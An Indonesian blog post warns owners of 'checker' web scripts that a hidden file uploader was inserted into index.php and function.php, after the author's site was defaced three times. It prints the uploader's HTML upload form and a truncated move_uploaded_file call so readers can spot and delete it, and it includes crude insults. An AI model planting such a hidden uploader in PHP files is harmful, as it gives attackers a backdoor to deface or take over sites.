Responsive Banner design
Home » , , , , » Waspada Buat Kalian Yang Punya Checker (Ada Hidden Uploader)

Waspada Buat Kalian Yang Punya Checker (Ada Hidden Uploader)

hay hay :D
apa kabar ? udah lama gak post disini selain mau mengucapkan selamat menunaikan ibadah
puasa bagi yang menjalankan ^_^.
jadi ceritanya gini , saya punya web checker bellasofie.net dan bellashofie.net :v
sama ajas sih :D
kena deface 3x , its oke lah 1 x itu tester nah ini 3x ?
itu namanya penghinaan..
terlebih saya udah tau disitu ada hidden uploader
berikut scriptnya :
echo "<h2></h2><hr>";
echo "<form action=\"\" method=\"post\"
enctype=\"multipart/form-data\">
<label for=\"file\"></
label>
<input type=\"file\" name=\"file\" id=\"file\" />
<br />
<input type=\"submit\"
name=\"default\" value=\"value\">
</form>";


script tersebut disisipkan di index.php dan juga function.php
kalian bisa cek siapa tau masih ada loggernya :D
bahaya ntar kena deface 


bagi kalian yang ada script itu nya segera hapus atau seperti saya dipath
 echo "<h2></h2><hr>";
echo "LAMER LAMER -_- DEFACE KOK PAKE HIDDEN ^_^ , OTAK DONK BANG";
{
move_uploaded_file($_FILES["file"]["tmp_name"


sumpah saya emosi banget :v
udah tau situasinya bulan puasa , terlebih lagi saya ada project >_<
jadi gak bisa kan di test..
jadi langsung upload zip trus extrak..
trus ditinggal , eh kena retas lagi :v
wkwkwk

yang lebih bkin naik darah di kasih background HOMO,
dan titlenya "Masih ingat dengan saya?"

Note :
just orang tolol yang memasuki lubang 2x , 1x tester , 2x tusboler , 3x penghinaan..

Penulis :
Syahrul Ramadhan

0 comments:

Post a Comment

Popular Posts

Powered by Blogger.